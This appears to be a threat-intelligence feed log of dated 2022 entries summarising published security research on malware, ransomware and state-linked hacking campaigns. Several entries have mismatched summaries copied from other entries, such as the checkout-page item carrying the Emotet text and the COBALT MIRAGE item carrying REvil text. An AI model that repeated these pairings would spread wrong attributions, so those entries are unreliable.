Intel Name:: Supply_Chain_Attack_targets_GitLab_CI_Pipelines

Date of Scan:: 2022-05-23

Impact:: Medium

Summary:: Researchers from SentinelLabs identified a software chain supply attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines. The campaign has been dubbed as CrateDepression.

Source: https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/

Intel Source:: Asec

Intel Name:: Lazarus_Group_Exploiting_Log4Shell_Vulnerability

Date of Scan:: 2022-05-20

Impact:: Medium

Summary:: Researchers from ASEC discovered Lazarus group distributing NukeSped by exploiting Log4Shell vulnerability. The threat actor used the log4j vulnerability on VMware Horizon products that were not applied with the security patch.

Source: https://asec.ahnlab.com/en/34461/

Intel Source:: WeiXin

Intel Name:: Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity

Date of Scan:: 2022-05-20

Impact:: Medium

Summary:: Researchers from 360 Threat Intelligence Center came across an attack activity launched by APT-C-24/Sidewinder in which the threat actor has come up with New TTP.

Source: https://mp-weixin-qq-com.translate.goog/s/qsGxZIiTsuI7o-_XmiHLHg?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=en

Intel Source:: CISA

Intel Name:: Threat_Actors_exploiting_VMware_vulnerability

Date of Scan:: 2022-05-20

Impact:: Medium

Summary:: CISA released an advisory to warn organizations about threat actors exploiting unpatched VMware vulnerabilities. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-138b

Intel Source:: Security Intelligence

Intel Name:: All_about_ITG23_Crypters

Date of Scan:: 2022-05-20

Impact:: Medium

Summary:: IBM X-Force researchers analyzed thirteen crypters that have all been used with malware built or operated by ITG23 internal teams or third-party distributors — including Trickbot, BazarLoader, Conti, and Colibri.

Source: https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

Intel Source:: ISC.SANS

Intel Name:: BumbleBee_Malware_getting_delivered_via_TransferXL_Urls

Date of Scan:: 2022-05-20

Impact:: Low

Summary:: Researchers at ISC.SANS were able to relate Bumblebee malware with EXOTIC LILY threat actor, as they saw usage of active TransferXL URLs delivering ISO files for Bumblebee malware.

Source: https://isc.sans.edu/diary/rss/28664

Intel Source:: PtSecurity

Intel Name:: Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms

Date of Scan:: 2022-05-20

Impact:: Medium

Summary:: Analysts at Positive Technologies came across a previously unknown Chinese hacking group known as 'Space Pirates' targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems. They have dubbed the threat actor Space Pirates.

Source: https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections/#id5-2

Intel Source:: Barracuda

Intel Name:: VMware_Bugs_Abused_to_Deliver_Mirai

Date of Scan:: 2022-05-19

Impact:: Medium

Summary:: Researchers from Barracuda discovered that attempts were made to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960. Mirai was getting delivered by abusing the VMware Bug.

Source: https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/

Intel Source:: Palo Alto

Intel Name:: Emotet_The_journey

Date of Scan:: 2022-05-19

Impact:: Medium

Summary:: Researchers from Palo Alto Networks documented the background on Emotet, its activity since november 2021 and ending with January 2022.

Source: https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/

Intel Source:: Palo Alto

Intel Name:: Threat Actors targets US Business Online Checkout Page

Date of Scan:: 2022-05-19

Impact:: Medium

Summary:: Researchers from Palo Alto Networks documented the background on Emotet, its activity since november 2021 and ending with January 2022.

Source: https://www.ic3.gov/Media/News/2022/220516.pdf

Intel Source:: Trend Micro

Intel Name:: Uncovering_Kingminer_Botnet_Attack

Date of Scan:: 2022-05-18

Impact:: Low

Summary:: Researchers from Trend Micro details about the TTPs of the Kinginer Botnet. In 2020 threat actors deployed Kingminer to target SQL servers for cryptocurrency mining.

Source: https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html

Intel Source:: Prodaft

Intel Name:: Wizard_Spider_Group_In_Depth_Analysis

Date of Scan:: 2022-05-18

Impact:: Medium

Summary:: Researchers from PRODAFT published the results of an investigation into Wizard Spider, believed to either be or be associated with the Grim Spider and Lunar Spider hacking groups.

Source: https://www.prodaft.com/resource/detail/ws-wizard-spider-group-depth-analysis

Intel Source:: Sucuri

Intel Name:: X_Cart_Skimmer_with_DOM_based_Obfuscation

Date of Scan:: 2022-05-18

Impact:: Low

Summary:: Security researcher from Sucuri worked on an infected X-Cart website and found two interesting credit card stealers there — one skimmer located server-side, the other client-side.

Source: https://blog.sucuri.net/2022/05/x-cart-skimmer-with-dom-based-obfuscation.html

Intel Source:: Fortinet

Intel Name:: Chaos_Ransomware_stands_with_Russia

Date of Scan:: 2022-05-18

Impact:: Medium

Summary:: FortiGuard Labs came across a variant of the Chaos ransomware that appears to side with Russia. This variant of the ransomware have been leveraginhg Russia Ukraine conflict.

Source: https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia

Intel Source:: Trend Micro

Intel Name:: RansomEXX_and_its_TTPs

Date of Scan:: 2022-05-18

Impact:: Medium

Summary:: Researchers from TrendMicro sheds light on the Tactics and Techniques of ransomware variant called RansomEXX which have been active since 2020.

Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

Intel Source:: NTT Security

Intel Name:: Operation RestyLink targeting Japenese Firms

Date of Scan:: 2022-05-18

Impact:: Medium

Summary:: Researchers from NTT security observed APT campaign targeting Japanese companies starting from mid of April 2022. The initial attack vector in this campaign was spear phishing email.

Source: https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies

Intel Source:: Jamf

Intel Name:: UpdateAgent_Returns_with_New_macOS_Malware_Dropper

Date of Scan:: 2022-05-17

Impact:: Low

Summary:: Researchers from Jamf Threat Labs came across a new variant of the macOS malware tracked as UpdateAgent. The malware relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server.

Source: https://www.jamf.com/blog/updateagent-adapts-again/

Intel Source:: CERT-UA

Intel Name:: UN_social_program_themed_online_fraud

Date of Scan:: 2022-05-17

Impact:: Medium

Summary:: CERT-UA researchers recently responded to discovery of fraudulent page on facebook that mimics the resource of the TV channel "TSN".

Source: https://cert.gov.ua/article/40240

Intel Source:: Cyfirma

Intel Name:: Onyx_Ransomware

Date of Scan:: 2022-05-17

Impact:: Low

Summary:: Researchers from Cyfirma analyzed samples of a new ransomware called Onyx which was first seen in April 2022. This ransomware encrypts files and then modifies their filenames by appending the .ampkcz extension.

Source: https://www.cyfirma.com/outofband/onyx-ransomware-report/

Intel Source:: JPCERT

Intel Name:: Analysis_of_the_HUI_Loader

Date of Scan:: 2022-05-17

Impact:: Low

Summary:: JPCERT researchers shared their analysis of the HUI Loader which has been used by multiple attack groups since around 2015, also the malware have been used by APT10.

Source: https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

Intel Source:: MalwareBytes

Intel Name:: Custom_PowerShell_RAT_targets_Germans

Date of Scan:: 2022-05-17

Impact:: Low

Summary:: Researchers from MalwareBytes came across a new campaign that plays on concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine and later infecting the victims with RAT.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/

Intel Source:: Palo Alto

Intel Name:: Malicious_HTML_Help_File_Delivering_Agent_Tesla

Date of Scan:: 2022-05-17

Impact:: Low

Summary:: Unit 42 researchers observed an attack utilizing malicious compiled HTML help files for the initial delivery. The method was used to deliver Agent Tesla.

Source: https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/

Intel Source:: Uptycs

Intel Name:: KurayStealer_Malware

Date of Scan:: 2022-05-16

Impact:: Low

Summary:: Researchers at Uptycs came across a new malware builder dubbed as KurayStealer that has password stealing and screenshot capabilities.The malware harvests the passwords and screenshots and sends them to the attackers’ Discord channel via webhooks.

Source: https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks

Intel Source:: CrowdStrike

Intel Name:: Novel IceApple Post-Exploitation Framework

Date of Scan:: 2022-05-16

Impact:: Low

Summary:: Researchers from CrowdStrike found New ‘post-exploitation’ threat getting deployed on Microsoft Exchange servers. The threat has been dubbed as IceApple.

Source: https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf

Intel Source:: Cluster25

Intel Name:: APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe

Date of Scan:: 2022-05-16

Impact:: Medium

Summary:: Cluster25 researchers analyzed several spear-phishing campaigns linked to APT29 that involve the usage of a side-loaded DLL through signed software (like Adobe suite) and legitimate webservices (like Dropbox) as communication vector for Command and Control (C&C).

Source: https://cluster25.io/2022/05/13/cozy-smuggled-into-the-box/

Intel Source:: Cyble

Intel Name:: Telegram_used_to_spread_Eternity_Malware

Date of Scan:: 2022-05-16

Impact:: Low

Summary:: Researchers from Cyble came across a new malware service, dubbed the Eternity Project by the threat actors behind it, allows cybercriminals to target potential victims with a customized threat offering based on individual modules.

Source: https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/

Intel Source:: Cybereason

Intel Name:: Quantum_Locker_Ransomware

Date of Scan:: 2022-05-16

Impact:: Medium

Summary:: Researchers at Cybereason analyzed Quantum Locker ransomware and demonstrated its detection and prevention. The initial infection method used by the operators is infamous malware called IceID.

Source: https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware

Intel Source:: ISC.SANS

Intel Name:: From_0_Day_to_Mirai

Date of Scan:: 2022-05-16

Impact:: High

Summary:: Researchers at ISC.SANS found attacks exploiting the recent high severity vulnerability in F5 products and were able to attribute the attacks to Mirai.

Source: https://isc.sans.edu/diary/rss/28644

Intel Source:: CERT-UA

Intel Name:: UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware

Date of Scan:: 2022-05-13

Impact:: Medium

Summary:: CERT-UA has analysed a phishing campaign with a subject as "On revenge in Kherson!" and containing an attachment in the form of a file "Plan Kherson.htm". The campaign is using a malicious program GammaLoad.PS1_v2 and attributed to a group called UAC-0010 (Armageddon).

Source: https://cert.gov.ua/article/40240

Intel Source:: Fortinet

Intel Name:: Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC

Date of Scan:: 2022-05-13

Impact:: Low

Summary:: Researchers at Fortinet's FortiGaurd Labs has analysed a phishing campaign that was delivering three fileless malware onto a victim’s device. Once executed, Malware are able to steal sensitive information from that device. It is majorly affecting Microsoft Windows platform users.

Source: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

Intel Source:: SecureWorks

Intel Name:: Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US

Date of Scan:: 2022-05-13

Impact:: Medium

Summary:: SecureWorks Counter Threat Unit has analysed REvil ransomware samples and this has resumed operations of GOLD SOUTHFIELD. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.

Source: https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us

Intel Source:: MalwareBytes

Intel Name:: APT34_targets_Jordan_Government_using_new_Saitama_backdoor

Date of Scan:: 2022-05-13

Impact:: Medium

Summary:: Researchers at Malwarebytes have discovered a malicious email targeting a government official at Jordan’s foreign ministry and researchers identified a suspicious message on April 26. It contained a malicious Excel document that delivered Saitama - a new hacking tool used to provide a backdoor into systems. Malwarebytes attributed the email to a threat group commonly known as APT34.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/

Intel Source:: NetSkope

Intel Name:: RedLine_Stealer_Campaign_spread_via_Github_hosted_payload

Date of Scan:: 2022-05-13

Impact:: Medium

Summary:: Researchers at NetSpoke Threat Labs has discovered a new RedLine Stealer campaign spread on YouTube, using a fake bot to buy Mystery Box NFT from Binance. The video description leads the victim to download the fake bot which is hosted on GitHub.

Source: https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload

Intel Source:: Proofpoint

Intel Name:: Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK

Date of Scan:: 2022-05-12

Impact:: Low

Summary:: Proofpoint researchers found previously undocumented remote access trojan (RAT) called Nerbian RAT written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K.

Source: https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques

Intel Source:: ISC.SANS

Intel Name:: TA578_distributing_Bumblebee_malware

Date of Scan:: 2022-05-12

Impact:: Medium

Summary:: Researchers at ISC.SANS has analysed a campaign where threat actor TA578 leveraging thread-hijacked emails to push ISO files for Bumblebee malware. These threat-hijacked emails either have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign.

Source: https://isc.sans.edu/diary/rss/28636

Intel Source:: JFrog

Intel Name:: Malicious_NPM_Packages_targets_German_Companies

Date of Scan:: 2022-05-12

Impact:: Low

Summary:: Researchers from Jfrog have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent companies based in Germany to carry out supply chain attacks.

Source: https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/

Intel Source:: Palo Alto

Intel Name:: Critical_F5_BIG_IP_Vulnerability_New_IoCs

Date of Scan:: 2022-05-12

Impact:: High

Summary:: Researchers from PaloAlto have also released few indicators of compromise and their view on Critical F5 BIG-IP Vulnerability.

Source: https://unit42.paloaltonetworks.com/cve-2022-1388/

Intel Source:: Cisco Talos

Intel Name:: Bitter APT expands its target list

Date of Scan:: 2022-05-12

Impact:: Medium

Summary:: An espionage-focused threat actor(Bitter APT) known for targeting China, Pakistan, and Saudi Arabia has included Bangladeshi government organizations as part of an ongoing campaign.

Source: https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

Intel Source:: checkpoint

Intel Name:: German_Automakers_targeted_by_InfoStealer_campaign

Date of Scan:: 2022-05-11

Impact:: Low

Summary:: Checkpoint researchers discovered A years-long phishing campaign has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.

Source: https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/

Intel Source:: Qualys

Intel Name:: New_Wave_of_Ursnif_Malware

Date of Scan:: 2022-05-11

Impact:: High

Summary:: Researchers at Qualys has discovered and analysed few phishing emails with a macro embedded XLS attachment or a zip attachment containing an HTA file initiated the infection chain. This targeted attack researchers attributed to Ursnif malware which is one of the most widespread banking trojans.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks

Intel Source:: SecureWorks

Intel Name:: REvil_returns_reemergening_GOLD_SOUTHFIELD

Date of Scan:: 2022-05-11

Impact:: High

Summary:: SecureWorks Counter Threat Unit has analysed REvil ransomware samples and this has resumed operations of GOLD SOUTHFIELD. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.

Source: https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence

Intel Source:: Palo Alto

Intel Name:: Different_elements_of_Cobalt_Strike

Date of Scan:: 2022-05-11

Impact:: Medium

Summary:: Palo Alto Unit42 researchers has analysed Cobalt Strike tool and gone through the encoding algorithm, describe definitions and differences of encoding types used in the Cobalt Strike framework, and cover some malicious attacks seen in the wild.

Source: https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/#Indicators-of-Compromise

Intel Source:: Trend Micro

Intel Name:: Examining_BlackBasta_ransomware

Date of Scan:: 2022-05-11

Impact:: Medium

Summary:: TrendMicro researchers have examined the whole infection routine of Black Basta ransomware and its infection tactics.

Source: https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

Intel Source:: Fortinet

Intel Name:: Recent Emotet Maldoc Outbreak

Date of Scan:: 2022-04-19

Impact:: MEDIUM

Summary:: Researchers at Fortinet has identified a recent Emotet outbreak is being spread through a variety of malicious Microsoft Office files or maldocs attached to phishing emails. Once a victim opens the attached document a VBA Macro or Excel 4.0 Macro is used to execute malicious code that downloads and runs the Emotet malware.

Source: https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak

Intel Source:: Symantec

Intel Name:: Lazarus Group Targets Chemical Sector

Date of Scan:: 2022-04-19

Impact:: MEDIUM

Summary:: Researchers from Symantec have observed Lazarus group conducting an espionage campaign targeting organizations operating within the chemical sector. This campaign has been dubbed Operation Drem Job.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical

Intel Source:: Microsoft/ESET

Intel Name:: Coordinated disruption of Zloader operation

Date of Scan:: 2022-04-19

Impact:: LOW

Summary:: DCU unit from Microsoft have taken technical action against Zloader and have disrupted their operations.ZLoader is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money.

Source: https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/ https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/

Intel Source:: Seguranca-Informatica

Intel Name:: SunnyDay Ransomware

Date of Scan:: 2022-04-19

Impact:: LOW

Summary:: Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result of the work some similarities between other ransomware samples such as Ever101 Medusa Locker Curator and Payment45 were found. According to the analysis “SunnyDay is a simple piece of ransomware based on the SALSA20 stream cipher”. SALSA20 is easy to recognize as it uses well-known values for its internal cryptographic operations.

Source: https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/#.Yl0eXdtBxPY

Intel Source:: SecureList

Intel Name:: New File extensions added to BlackCat ransomware's arsenal

Date of Scan:: 2022-04-18

Impact:: MEDIUM

Summary:: Researchers at SecureList has analysed BlackCat Ransomware Group's activities since its inception. They are also comparing BlackCat TTPs with BlackMatter Group like a custom exflitration tool called 'Fendr' previously been used exclusively in BlackMatter ransomware activity.

Source: https://securelist.com/a-bad-luck-blackcat/106254/

Intel Source:: SecureList

Intel Name:: Emotet Modules and Recent Attacks

Date of Scan:: 2022-04-18

Impact:: MEDIUM

Summary:: Researchers from Kaspersky were able to etrieve 10 of the 16 modules used by Emotet for Credential/Password/Account/E-mail stealing and spamming. Also the statistics on recent Emotet attacks were also shared.

Source: https://securelist.com/emotet-modules-and-recent-attacks/106290/

Intel Source:: Cynet

Intel Name:: BumbleBee Malware campaign

Date of Scan:: 2022-04-18

Impact:: LOW

Summary:: Researchers from Cynet Security found a new campaign which instead of using malicious office documents is using malicious ISO image files luring victims to execute the BumbleBee malware.

Source: https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/

Intel Source:: STR

Intel Name:: CVE_2022_22954_Seeder_Queries_14042022

Date of Scan:: 2022-04-18

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: netlab360

Intel Name:: New Fodcha DDoS botnet

Date of Scan:: 2022-04-18

Impact:: MEDIUM

Summary:: Researchers at Qihoo 360's Network Security Research Lab has discovered a new DDoS botnet called 'Fodcha'. The Botnet has spread to over 62 000 devices between March 29 and April 10. The number of unique IP addresses linked to the botnet that researchers are tracking is10 000-strong Fodcha army of bots using Chinese IP addresses every day.

Source: https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/

Intel Source:: Prodaft

Intel Name:: Indepth analysis of PYSA Ransomware Group

Date of Scan:: 2022-04-18

Impact:: MEDIUM

Summary:: Researchers at PRODAFT has identified and gained visibility into PYSA's ransomware infrastructure and analyzed its findings to gain insight into how the criminal operation works.

Source: https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis

Intel Source:: STR

Intel Name:: CVE_2022_24527_Seeder_Queries_14042022

Date of Scan:: 2022-04-18

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: CERT-UA

Intel Name:: XSS Vulnerability in Zimbra leveraged to target Ukraine Government

Date of Scan:: 2022-04-18

Impact:: MEDIUM

Summary:: CERT-UA has detected threat actors are targeting Ukrainian government agencies with new attacks exploiting Zimbra XSS Vulnerability (CVE-2018-6882). CERT-UA has attributed this campaign to UAC-0097 a currently unknown actor.

Source: https://cert.gov.ua/article/39606 https://docs.google.com/spreadsheets/d/1Y987F976R9j4ztw2IyDzazzfpGL2bL00kCYFAeeo2tE/edit#gid=0

Intel Source:: Cisco Talos

Intel Name:: ZingoStealer by Haskers Group

Date of Scan:: 2022-04-14

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos has identified a new information stealer called 'ZingoStealer' that has been released for free by a threat actor known as 'Haskers Gang.' This information stealer first introduced to the wild in March 2022 is currently undergoing active development and multiple releases of new versions have been observed recently.

Source: https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/760/original/zingostealer-blog-iocs.txt?1649940925

Intel Source:: Group-IB

Intel Name:: OldGremlin Gang resumes attack with new methods

Date of Scan:: 2022-04-14

Impact:: MEDIUM

Summary:: Group-IB has uncovered new attacks tools and methods used by OldGremlin Ransomware Group. In spring 2020 Group was first identified by Group-IB researchers over the past two years OldGremlin has conducted 13 malicious email campaigns. Researchers also discovered two variants of TinyFluff malware an earlier one that is more complex and a newer simplified version that copies the script and the Node.js interpreter from its storage location.

Source: https://blog.group-ib.com/oldgremlin_comeback

Intel Source:: HP Wolf Security

Intel Name:: Malware Campaigns Targeting African Banking Sector

Date of Scan:: 2022-04-14

Impact:: MEDIUM

Summary:: Researchers from HP Wolf Security have been tracking the campaign since early 2022 an employee of an unnamed West African bank received an email purporting to be from a recruiter at another African bank with information about job opportunities. A cybercrime campaign targeting the African banking sector is leveraging phishing emails and HTML smuggling techniques to deploy malware.

Source: https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/

Intel Source:: Microsoft

Intel Name:: Critical Remote Code Execution Vulnerability in Windows RPC Runtime

Date of Scan:: 2022-04-14

Impact:: HIGH

Summary:: Microsoft’s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492 CVE-2022-24528 and CVE-2022-26809. By exploiting these vulnerabilities a remote unauthenticated attacker can execute code on the vulnerable machine with the privileges of the RPC service which depends on the process hosting the RPC runtime.

Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/

Intel Source:: Fortinet

Intel Name:: Enemybot leveraged by Keksec group

Date of Scan:: 2022-04-14

Impact:: MEDIUM

Summary:: Researchers at FortiGuard Labs have identified a new DDoS botnet called “Enemybot” and attributed it to a threat group called 'Keksec' that specializes in cryptomining and DDoS attacks. This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.

Source: https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet

Intel Source:: CERT-UA

Intel Name:: IcedID malware targeting Ukraine state bodies

Date of Scan:: 2022-04-14

Impact:: MEDIUM

Summary:: CERT-UA has issued a new heads-up that warns of an ongoing cyber-attack leveraging the infamous IcedID malware designed to compromise Ukrainian state bodies. The detected malware also dubbed as BankBot or BokBot is a banking Trojan primarily designed to target financial data and steal banking credentials.

Source: https://cert.gov.ua/article/39609 https://docs.google.com/spreadsheets/d/1QTwDDOO8JBpZbNyOnNvMm7VcZDQS0Y3CjYsMLrTKN7c/edit#gid=0

Intel Source:: ASEC

Intel Name:: Virus/XLS Xanpei Infecting Excel Files

Date of Scan:: 2022-04-14

Impact:: MEDIUM

Summary:: ASEC Research team have identified a constant distribution of malware strains that spread the infection when Excel file is opened. Upon opening the infected Excel file the file containing virus VBA code is dropped to Excel startup path. And when any Excel file is opened the malicious file dropped in Excel startup path is automatically executed to infect with virus and perform additional malicious behaviors.

Source: https://asec.ahnlab.com/en/33630/

Intel Source:: 360 Beacon Lab

Intel Name:: Bahamut group recent attacks

Date of Scan:: 2022-04-12

Impact:: MEDIUM

Summary:: Researcher at 360 Beacon Lab has identifed a suspected mobile terminal attack activity of Bahamut group. Bahamut is an advanced threat group targeting the Middle East and South Asia. Group mainly uses phishing websites fake news websites and social networking sites to attack.

Source: https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=zh-CN

Intel Source:: Palo Alto

Intel Name:: New version of SolarMarker Malware

Date of Scan:: 2022-04-12

Impact:: MEDIUM

Summary:: A new version of SolarMarker a malware family known for its infostealing and backdoor capabilities has been identified by Palo Alto Networks and is believed to be active as of April 2022. This malware has been prevalent since September 2020 targeting U.S. organizations and part of the infrastructure is still active as of 2022 in addition to a new infrastructure that attackers have recently deployed.

Source: https://unit42.paloaltonetworks.com/solarmarker-malware/

Intel Source:: Microsoft

Intel Name:: Tarrask - HAFNIUM APT defense evasion malware

Date of Scan:: 2022-04-12

Impact:: MEDIUM

Summary:: Microsoft Threat Intelligence Center has tracked the Chinese-backed Hafnium hacking group and identified that the group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments. MSTIC has dubbed the defense evasion malware 'Tarrask ' characterized it as a tool that creates 'hidden' scheduled tasks on the system.

Source: https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

Intel Source:: TeamCymru

Intel Name:: MoqHao Malware targeting European countries

Date of Scan:: 2022-04-12

Impact:: LOW

Summary:: Researchers at TeamCymru has examined the current target base of Roaming Mantis group where the group is levearging MoqHao malware to target European countries. MoqHao is generally used to target Android users often via an initial attack vector of smishing.

Source: https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/

Intel Source:: Cofense

Intel Name:: Fake COVID-19 forms targeting companies

Date of Scan:: 2022-04-12

Impact:: MEDIUM

Summary:: Cofense Phishing Defense Center has analysed a phishing campaign where threat actors impersonate companies to send out fake COVID-19 forms. CPDC team saw a phishing email masquerading as a general office wide email claiming someone in the building has been infected with COVID-19 and asking to review the company policy.

Source: https://cofense.com/blog/covid-19-phish-targeting-companies

Intel Source:: ASEC

Intel Name:: SystemBC Malware

Date of Scan:: 2022-04-12

Impact:: MEDIUM

Summary:: ASEC Research team have identified a proxy malware called SystemBC that has been used by various attackers for the last few years. While it is recently distributed through SmokeLoader or Emotet this malware has steadily been used in various ransomware attacks in the past.

Source: https://asec.ahnlab.com/en/33600/

Intel Source:: ClearSky

Intel Name:: EvilNominatus Ransomware

Date of Scan:: 2022-04-12

Impact:: LOW

Summary:: Researchers at ClearSky has detected a malicious BAT file that was uploaded to VirusTotal from Iran. This file executes a ransomware that was associated with the EvilNominatus ransomware initially exposed at the end of 2021. Researchers believe that the ransomware’s developer is a young Iranian who bragged about its development on Twitter.

Source: https://www.clearskysec.com/wp-content/uploads/2022/04/EvilNominatus_Ransomware_7.4.22.pdf

Intel Source:: STR

Intel Name:: NetSupport RAT_Seeder_Queries_08/04/2022

Date of Scan:: 2022-04-12

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: STR Repository

Intel Source:: CERT-UA

Intel Name:: Sandworm Group (UAC-0082) targetiing Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER

Date of Scan:: 2022-04-12

Impact:: MEDIUM

Summary:: CERT-UA has taken urgent measures to respond to an information security incident related to a targeted attack on Ukraine's energy facility.

Source: https://cert.gov.ua/article/39518 https://docs.google.com/spreadsheets/d/1T2NyaCKfjszODa0hRu4xZFpnPe8yWP607aNHb7iB_ec/edit#gid=0

Intel Source:: Facebook

Intel Name:: Multiple cyber espionage operations disrupted

Date of Scan:: 2022-04-11

Impact:: MEDIUM

Summary:: Meta has shared their Adversarial Threat report in which they provide a broader view into the cyber threats Facebook observes in Iran Azerbaijan Ukraine Russia South America and the Philippines.

Source: https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf

Intel Source:: Cluster25

Intel Name:: DPRK-Nexus threat actor spear-phishing campaign

Date of Scan:: 2022-04-11

Impact:: LOW

Summary:: Researchers at Cluster25 has identified a recent activity that started in early days of April 2022 from a DPRK-nexus threat actor using spear-phishing emails containing korean-based malicious documents with different lures to compromise its victims.

Source: https://cluster25.io/2022/04/11/dprk-nexus-adversary-new-kitty-phishing/

Intel Source:: Trend Micro

Intel Name:: Mirai Botnet exploiting Spring4Shell Vulnerability

Date of Scan:: 2022-04-11

Impact:: MEDIUM

Summary:: Trend Micro Research team has confirmed on some earlier reports that the new Spring4Shell vulnerability has been exploited by the Mirai Botnet. The Mirai sample is downloaded to the ‘/tmp’ folder and executed after permission change to make them executable using ‘chmod’.

Source: https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html

Intel Source:: Cado security

Intel Name:: Denonia Malware specifically targeting AWS Lambda

Date of Scan:: 2022-04-11

Impact:: MEDIUM

Summary:: Researchers from Cado Security published their findings on a new malware called 'Denonia' variant that targets AWS Lambda. After further investigation the researchers found the sample was a 64-bit ELF executable. The malware also relies on third-party GitHub libraries including those for writing Lambda functions and retrieving data from Lambda invoke requests.

Source: https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

Intel Source:: Zscaler

